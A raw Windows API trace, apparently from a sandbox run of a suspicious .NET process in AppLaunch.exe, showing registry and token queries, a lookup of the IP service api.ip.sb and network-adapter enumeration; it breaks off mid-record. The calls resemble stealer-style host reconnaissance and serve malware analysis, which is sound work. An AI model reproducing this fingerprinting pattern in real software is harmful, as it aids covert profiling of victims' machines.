RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efdc | out: phkResult=0x38efdc*=0x27c) returned 0x0 [0186.471] RegQueryValueExW (in: hKey=0x27c, lpValueName="SystemDefaultTlsVersions", lpReserved=0x0, lpType=0x38eff8, lpData=0x0, lpcbData=0x38eff4*=0x0 | out: lpType=0x38eff8*=0x0, lpData=0x0, lpcbData=0x38eff4*=0x0) returned 0x2 [0186.471] RegCloseKey (hKey=0x27c) returned 0x0 [0186.472] GetCurrentProcessId () returned 0xf1c [0186.472] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf1c) returned 0x27c [0186.472] EnumProcessModules (in: hProcess=0x27c, lphModule=0x262e1a8, cb=0x100, lpcbNeeded=0x38efe0 | out: lphModule=0x262e1a8, lpcbNeeded=0x38efe0) returned 1 [0186.473] GetModuleInformation (in: hProcess=0x27c, hModule=0x400000, lpmodinfo=0x262e2e8, cb=0xc | out: lpmodinfo=0x262e2e8*(lpBaseOfDll=0x400000, SizeOfImage=0x20000, EntryPoint=0x4191a6)) returned 1 [0186.473] CoTaskMemAlloc (cb=0x804) returned 0x735c60 [0186.473] GetModuleBaseNameW (in: hProcess=0x27c, hModule=0x400000, lpBaseName=0x735c60, nSize=0x800 | out: lpBaseName="AppLaunch.exe") returned 0xd [0186.474] CoTaskMemFree (pv=0x735c60) [0186.474] CoTaskMemAlloc (cb=0x804) returned 0x735c60 [0186.474] GetModuleFileNameExW (in: hProcess=0x27c, hModule=0x400000, lpFilename=0x735c60, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\applaunch.exe")) returned 0x3b [0186.474] CoTaskMemFree (pv=0x735c60) [0186.474] CloseHandle (hObject=0x27c) returned 1 [0186.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", nBufferLength=0x105, lpBuffer=0x38eb08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpFilePart=0x0) returned 0x3b [0186.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.RequireCertificateEKUs", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efd8 | out: phkResult=0x38efd8*=0x0) returned 0x2 [0186.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efd8 | out: phkResult=0x38efd8*=0x27c) returned 0x0 [0186.475] RegQueryValueExW (in: hKey=0x27c, lpValueName="RequireCertificateEKUs", lpReserved=0x0, lpType=0x38eff4, lpData=0x0, lpcbData=0x38eff0*=0x0 | out: lpType=0x38eff4*=0x0, lpData=0x0, lpcbData=0x38eff0*=0x0) returned 0x2 [0186.475] RegCloseKey (hKey=0x27c) returned 0x0 [0186.476] QueryPerformanceFrequency (in: lpFrequency=0x167328 | out: lpFrequency=0x167328*=100000000) returned 1 [0186.476] QueryPerformanceCounter (in: lpPerformanceCount=0x38f0e4 | out: lpPerformanceCount=0x38f0e4*=1195003410160) returned 1 [0186.479] GetCurrentProcess () returned 0xffffffff [0186.479] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ecf8 | out: TokenHandle=0x38ecf8*=0x27c) returned 1 [0186.483] CloseHandle (hObject=0x27c) returned 1 [0186.483] GetCurrentProcess () returned 0xffffffff [0186.483] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ed10 | out: TokenHandle=0x38ed10*=0x27c) returned 1 [0186.483] CloseHandle (hObject=0x27c) returned 1 [0186.488] GetCurrentProcess () returned 0xffffffff [0186.488] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38efc8 | out: TokenHandle=0x38efc8*=0x27c) returned 1 [0186.953] CoTaskMemAlloc (cb=0xcc0) returned 0x735c60 [0186.955] RasEnumConnectionsW (in: param_1=0x735c60, param_2=0x38efd8, param_3=0x38efdc | out: param_1=0x735c60, param_2=0x38efd8, param_3=0x38efdc) returned 0x0 [0187.262] CoTaskMemFree (pv=0x735c60) [0187.262] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x278 [0187.263] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2a8 [0187.264] ioctlsocket (in: s=0x278, cmd=-2147195266, argp=0x38efe0 | out: argp=0x38efe0) returned 0 [0187.264] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2ac [0187.265] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2b0 [0187.265] ioctlsocket (in: s=0x2ac, cmd=-2147195266, argp=0x38efe0 | out: argp=0x38efe0) returned 0 [0187.265] WSAIoctl (in: s=0x278, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x38efc8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x38efc8, lpOverlapped=0x0) returned -1 [0187.266] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x38ecf8, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0187.294] WSAEventSelect (s=0x278, hEventObject=0x2a8, lNetworkEvents=512) returned 0 [0187.294] WSAIoctl (in: s=0x2ac, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x38efc8, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x38efc8, lpOverlapped=0x0) returned -1 [0187.294] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x38ecf8, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0187.294] WSAEventSelect (s=0x2ac, hEventObject=0x2b0, lNetworkEvents=512) returned 0 [0187.294] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2b8 [0187.295] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x2b8, param_3=0x3) returned 0x0 [0187.302] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x38eff4 | out: phkResult=0x38eff4*=0x2d0) returned 0x0 [0187.303] RegOpenKeyExW (in: hKey=0x2d0, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efa8 | out: phkResult=0x38efa8*=0x2d4) returned 0x0 [0187.303] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2d8 [0187.303] RegNotifyChangeKeyValue (hKey=0x2d4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2d8, fAsynchronous=1) returned 0x0 [0187.304] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efac | out: phkResult=0x38efac*=0x2dc) returned 0x0 [0187.305] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e0 [0187.305] RegNotifyChangeKeyValue (hKey=0x2dc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2e0, fAsynchronous=1) returned 0x0 [0187.305] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x38efac | out: phkResult=0x38efac*=0x2e4) returned 0x0 [0187.306] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e8 [0187.306] RegNotifyChangeKeyValue (hKey=0x2e4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2e8, fAsynchronous=1) returned 0x0 [0187.306] GetCurrentProcess () returned 0xffffffff [0187.306] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ef9c | out: TokenHandle=0x38ef9c*=0x2ec) returned 1 [0187.310] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x38e8a0 | out: phkResult=0x38e8a0*=0x2f0) returned 0x0 [0187.310] RegQueryValueExW (in: hKey=0x2f0, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x38e8bc, lpData=0x0, lpcbData=0x38e8b8*=0x0 | out: lpType=0x38e8bc*=0x0, lpData=0x0, lpcbData=0x38e8b8*=0x0) returned 0x2 [0187.310] RegCloseKey (hKey=0x2f0) returned 0x0 [0187.830] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x705db0 [0187.961] WinHttpSetTimeouts (hInternet=0x705db0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0187.961] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x38efa8 | out: pProxyConfig=0x38efa8) returned 1 [0187.993] CloseHandle (hObject=0x27c) returned 1 [0187.999] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x38e7e0, nSize=0x9c | out: lpBuffer="") returned 0x0 [0188.000] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x38e7e0, nSize=0x9c | out: lpBuffer="") returned 0x0 [0188.003] EtwEventRegister () returned 0x0 [0188.008] GetCurrentProcess () returned 0xffffffff [0188.008] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ecc0 | out: TokenHandle=0x38ecc0*=0x330) returned 1 [0188.011] CloseHandle (hObject=0x330) returned 1 [0188.012] GetCurrentProcess () returned 0xffffffff [0188.012] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ecd8 | out: TokenHandle=0x38ecd8*=0x330) returned 1 [0188.012] CloseHandle (hObject=0x330) returned 1 [0188.017] SetEvent (hEvent=0x270) returned 1 [0188.039] GetCurrentProcess () returned 0xffffffff [0188.039] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ec40 | out: TokenHandle=0x38ec40*=0x340) returned 1 [0188.041] CloseHandle (hObject=0x340) returned 1 [0188.041] GetCurrentProcess () returned 0xffffffff [0188.041] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x38ec58 | out: TokenHandle=0x38ec58*=0x340) returned 1 [0188.042] CloseHandle (hObject=0x340) returned 1 [0188.044] GetTimeZoneInformation (in: lpTimeZoneInformation=0x38ee08 | out: lpTimeZoneInformation=0x38ee08) returned 0x1 [0188.158] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x38ec64 | out: pTimeZoneInformation=0x38ec64) returned 0x1 [0188.160] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x38ed48 | out: phkResult=0x38ed48*=0x340) returned 0x0 [0188.161] RegQueryValueExW (in: hKey=0x340, lpValueName="TZI", lpReserved=0x0, lpType=0x38ed64, lpData=0x0, lpcbData=0x38ed60*=0x0 | out: lpType=0x38ed64*=0x3, lpData=0x0, lpcbData=0x38ed60*=0x2c) returned 0x0 [0188.161] RegQueryValueExW (in: hKey=0x340, lpValueName="TZI", lpReserved=0x0, lpType=0x38ed64, lpData=0x26375e0, lpcbData=0x38ed60*=0x2c | out: lpType=0x38ed64*=0x3, lpData=0x26375e0*, lpcbData=0x38ed60*=0x2c) returned 0x0 [0188.162] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x38eb9c | out: phkResult=0x38eb9c*=0x0) returned 0x2 [0188.163] RegQueryValueExW (in: hKey=0x340, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x38ed3c, lpData=0x0, lpcbData=0x38ed38*=0x0 | out: lpType=0x38ed3c*=0x1, lpData=0x0, lpcbData=0x38ed38*=0x20) returned 0x0 [0188.163] RegQueryValueExW (in: hKey=0x340, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x38ed3c, lpData=0x2637a04, lpcbData=0x38ed38*=0x20 | out: lpType=0x38ed3c*=0x1, lpData="@tzres.dll,-320", lpcbData=0x38ed38*=0x20) returned 0x0 [0188.163] RegQueryValueExW (in: hKey=0x340, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x38ed3c, lpData=0x0, lpcbData=0x38ed38*=0x0 | out: lpType=0x38ed3c*=0x1, lpData=0x0, lpcbData=0x38ed38*=0x20) returned 0x0 [0188.163] RegQueryValueExW (in: hKey=0x340, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x38ed3c, lpData=0x2637a5c, lpcbData=0x38ed38*=0x20 | out: lpType=0x38ed3c*=0x1, lpData="@tzres.dll,-322", lpcbData=0x38ed38*=0x20) returned 0x0 [0188.163] RegQueryValueExW (in: hKey=0x340, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x38ed3c, lpData=0x0, lpcbData=0x38ed38*=0x0 | out: lpType=0x38ed3c*=0x1, lpData=0x0, lpcbData=0x38ed38*=0x20) returned 0x0 [0188.163] RegQueryValueExW (in: hKey=0x340, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x38ed3c, lpData=0x2637ab4, lpcbData=0x38ed38*=0x20 | out: lpType=0x38ed3c*=0x1, lpData="@tzres.dll,-321", lpcbData=0x38ed38*=0x20) returned 0x0 [0188.170] CoTaskMemAlloc (cb=0x20c) returned 0x7478f8 [0188.170] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7478f8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0188.172] CoTaskMemFree (pv=0x7478f8) [0188.172] CoTaskMemAlloc (cb=0x20c) returned 0x7478f8 [0188.172] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x38ed58, pwszFileMUIPath=0x7478f8, pcchFileMUIPath=0x38ed5c, pululEnumerator=0x38ed50 | out: pwszLanguage=0x0, pcchLanguage=0x38ed58, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x38ed5c, pululEnumerator=0x38ed50) returned 1 [0188.177] CoTaskMemFree (pv=0x0) [0188.177] CoTaskMemFree (pv=0x7478f8) [0188.178] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3b0001 [0188.181] CoTaskMemAlloc (cb=0x3ec) returned 0x7478f8 [0188.181] LoadStringW (in: hInstance=0x3b0001, uID=0x140, lpBuffer=0x7478f8, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0188.181] CoTaskMemFree (pv=0x7478f8) [0188.181] FreeLibrary (hLibModule=0x3b0001) returned 1 [0188.182] CoTaskMemAlloc (cb=0x20c) returned 0x7478f8 [0188.182] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7478f8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0188.182] CoTaskMemFree (pv=0x7478f8) [0188.182] CoTaskMemAlloc (cb=0x20c) returned 0x7478f8 [0188.182] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x38ed58, pwszFileMUIPath=0x7478f8, pcchFileMUIPath=0x38ed5c, pululEnumerator=0x38ed50 | out: pwszLanguage=0x0, pcchLanguage=0x38ed58, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x38ed5c, pululEnumerator=0x38ed50) returned 1 [0188.185] CoTaskMemFree (pv=0x0) [0188.185] CoTaskMemFree (pv=0x7478f8) [0188.185] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3b0001 [0188.187] CoTaskMemAlloc (cb=0x3ec) returned 0x7478f8 [0188.187] LoadStringW (in: hInstance=0x3b0001, uID=0x142, lpBuffer=0x7478f8, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0188.187] CoTaskMemFree (pv=0x7478f8) [0188.187] FreeLibrary (hLibModule=0x3b0001) returned 1 [0188.188] CoTaskMemAlloc (cb=0x20c) returned 0x7478f8 [0188.188] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7478f8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0188.188] CoTaskMemFree (pv=0x7478f8) [0188.188] CoTaskMemAlloc (cb=0x20c) returned 0x7478f8 [0188.188] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x38ed58, pwszFileMUIPath=0x7478f8, pcchFileMUIPath=0x38ed5c, pululEnumerator=0x38ed50 | out: pwszLanguage=0x0, pcchLanguage=0x38ed58, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x38ed5c, pululEnumerator=0x38ed50) returned 1 [0188.190] CoTaskMemFree (pv=0x0) [0188.190] CoTaskMemFree (pv=0x7478f8) [0188.191] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x3b0001 [0188.193] CoTaskMemAlloc (cb=0x3ec) returned 0x7478f8 [0188.193] LoadStringW (in: hInstance=0x3b0001, uID=0x141, lpBuffer=0x7478f8, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0188.193] CoTaskMemFree (pv=0x7478f8) [0188.193] FreeLibrary (hLibModule=0x3b0001) returned 1 [0188.194] RegCloseKey (hKey=0x340) returned 0x0 [0188.194] SetEvent (hEvent=0x270) returned 1 [0188.195] GetACP () returned 0x4e4 [0188.206] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x38ef64 | out: pFixedInfo=0x0, pOutBufLen=0x38ef64) returned 0x6f [0188.222] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x728970 [0188.222] GetNetworkParams (in: pFixedInfo=0x728970, pOutBufLen=0x38ef64 | out: pFixedInfo=0x728970, pOutBufLen=0x38ef64) returned 0x0 [0188.237] LocalFree (hMem=0x728970) returned 0x0 [0188.240] CoTaskMemAlloc (cb=0x20c) returned 0x735be0 [0188.240] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x735be0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0188.240] CoTaskMemFree (pv=0x735be0) [0188.240] CoTaskMemAlloc (cb=0x20c) returned 0x735be0 [0188.240] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x735be0, nSize=0x104 | out: lpBuffer="") returned 0x0 [0188.240] CoTaskMemFree (pv=0x735be0) [0188.247] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x34c [0188.248] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x348 [0188.249] GetAddrInfoW (in: pNodeName="api.ip.sb", pServiceName=0x0, pHints=0x38ee40*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x38ede8 | out: ppResult=0x38ede8*=0x750dd8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.ip.sb.cdn.cloudflare.net", ai_addr=0x751d48*(sa_family=2, sin_port=0x0, sin_addr="104.26.13.31"), ai_next=0x750e00*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x751d78*(sa_family=2, sin_port=0x0, sin_addr="172.67.75.172"), ai_next=0x750e28*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x751d90*(sa_family=2, sin_port=0x0, sin_addr="104.26.12.31"), ai_next=0x0)))) returned 0 [0188.329] FreeAddrInfoW (pAddrInfo=0x750dd8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.ip.sb.cdn.cloudflare.net", ai_addr=0x751d48*(sa_family=2, sin_port=0x0, sin_addr="104.26.13.31"), ai_next=0x750e00*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x751d78*(sa_family=2, sin_port=0x0, sin_addr="172.67.75.172"), ai_next=0x750e28*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x751d90*(sa_family=2, sin_port=0x0, sin_addr="104.26.12.31"), ai_next=0x0)))) [0188.330] GetAddrInfoW (in: pNodeName="api.ip.sb", pServiceName=0x0, pHints=0x38ee40*(ai_flags=131072, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x38ede8 | out: ppResult=0x38ede8*=0x750e00*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.ip.sb", ai_addr=0x751d90*(sa_family=2, sin_port=0x0, sin_addr="104.26.13.31"), ai_next=0x750dd8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x751d78*(sa_family=2, sin_port=0x0, sin_addr="172.67.75.172"), ai_next=0x750d60*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x751d48*(sa_family=2, sin_port=0x0, sin_addr="104.26.12.31"), ai_next=0x0)))) returned 0 [0188.332] FreeAddrInfoW (pAddrInfo=0x750e00*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.ip.sb", ai_addr=0x751d90*(sa_family=2, sin_port=0x0, sin_addr="104.26.13.31"), ai_next=0x750dd8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x751d78*(sa_family=2, sin_port=0x0, sin_addr="172.67.75.172"), ai_next=0x750d60*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x751d48*(sa_family=2, sin_port=0x0, sin_addr="104.26.12.31"), ai_next=0x0)))) [0188.333] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x350 [0188.334] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x354 [0188.334] ioctlsocket (in: s=0x350, cmd=-2147195266, argp=0x38ee18 | out: argp=0x38ee18) returned 0 [0188.334] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x358 [0188.334] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x35c [0188.335] ioctlsocket (in: s=0x358, cmd=-2147195266, argp=0x38ee18 | out: argp=0x38ee18) returned 0 [0188.335] WSAIoctl (in: s=0x350, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x38ee00, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x38ee00, lpOverlapped=0x0) returned -1 [0188.335] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x38eb30, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0188.335] WSAEventSelect (s=0x350, hEventObject=0x354, lNetworkEvents=512) returned 0 [0188.335] WSAIoctl (in: s=0x358, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x38ee00, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x38ee00, lpOverlapped=0x0) returned -1 [0188.335] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x38eb30, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0188.335] WSAEventSelect (s=0x358, hEventObject=0x35c, lNetworkEvents=512) returned 0 [0188.335] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x0, SizePointer=0x38edfc*=0x0 | out: AdapterAddresses=0x0, SizePointer=0x38edfc*=0x7ec) returned 0x6f [0188.342] LocalAlloc (uFlags=0x0, uBytes=0x7ec) returned 0x753040 [0188.342] GetAdaptersAddresses (in: Family=0x0, Flags=0x2e, Reserved=0x0, AdapterAddresses=0x753040, SizePointer=0x38edfc*=0x7ec | out: AdapterAddresses=0x753040*(Alignment=0xf00000178, Length=0x178, IfIndex=0xf, Next=0x75330c, AdapterName="{2E4C7576-F100-4C39-A70C-5E6D4E6BF9B7}", FirstUnicastAddress=0x753280, FirstAnycastAddress=0x0, FirstMulticastAddress=0x0, FirstDnsServerAddress=0x0, DnsSuffix="", Description="Intel(R) 82574L Gigabit Network Connection #4", FriendlyName="Local Area Connection 4", PhysicalAddress=([0]=0x0, [1]=0x19, [2]=0x7a, [3]=0x46, [4]=0x53, [5]=0x4c, [6]=0x0, [7]=0x0), PhysicalAddressLength=0x6, Flags=0x3e5, DdnsEnabled=0x3e5, RegisterAdapterSuffix=0x3e5, Dhcpv4Enabled=0x3e5, ReceiveOnly=0x3e5, NoMulticast=0x3e5, Ipv6OtherStatefulConfig=0x3e5, NetbiosOverTcpipEnabled=0x3e5, Ipv4Enabled=0x3e5, Ipv6Enabled=0x3e5, Ipv6ManagedAddressConfigurationSupported=0x3e5, Mtu=0x5dc, IfType=0x6, OperStatus=0x1, Ipv6IfIndex=0xf, ZoneIndices=([0]=0xf, [1]=0xf, [2]=0xf, [3]=0xf, [4]=0x1, [5]=0x1, [6]=0x1, [7]=0x1, [8]=0x1, [9]=0x1, [10]=0x1, [11]=0x1, [12]=0x1, [13]=0x1, [14]=0x0, [15]=0x1), FirstPrefix=0x0, TransmitLinkSpeed=0x3b9aca00, ReceiveLinkSpeed=0x3b9aca00, FirstWinsServerAddress=0x0, FirstGatewayAddress=0x0, Ipv4Metric=0xa, Ipv6Metric=0xa, Luid=0x6000009000000, Dhcpv4Server.lpSockaddr=0x7531b8*(sa_family=2, sin_port=0x0, sin_addr="192.168.0.1"), Dhcpv4Server.iSockaddrLength=16, CompartmentId=0x1, NetworkGuid=0x11de7039846ee341, ConnectionType=0x1, TunnelType=0x0, Dhcpv6Server.lpSockaddr=0x0, Dhcpv6Server.iSockaddrLength=0, Dhcpv6ClientDuid=([0]=0x0, [1]=0x1, [2]=0x0, [3]=0x1, [4]=0x27, [5]=0xbf, [6]=0xe, [7]=0x9e, [8]=0x0, [9]=0x26, [10]=0x67, [11]=0xd5, [12]=0xc6, [13]=0x31, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, 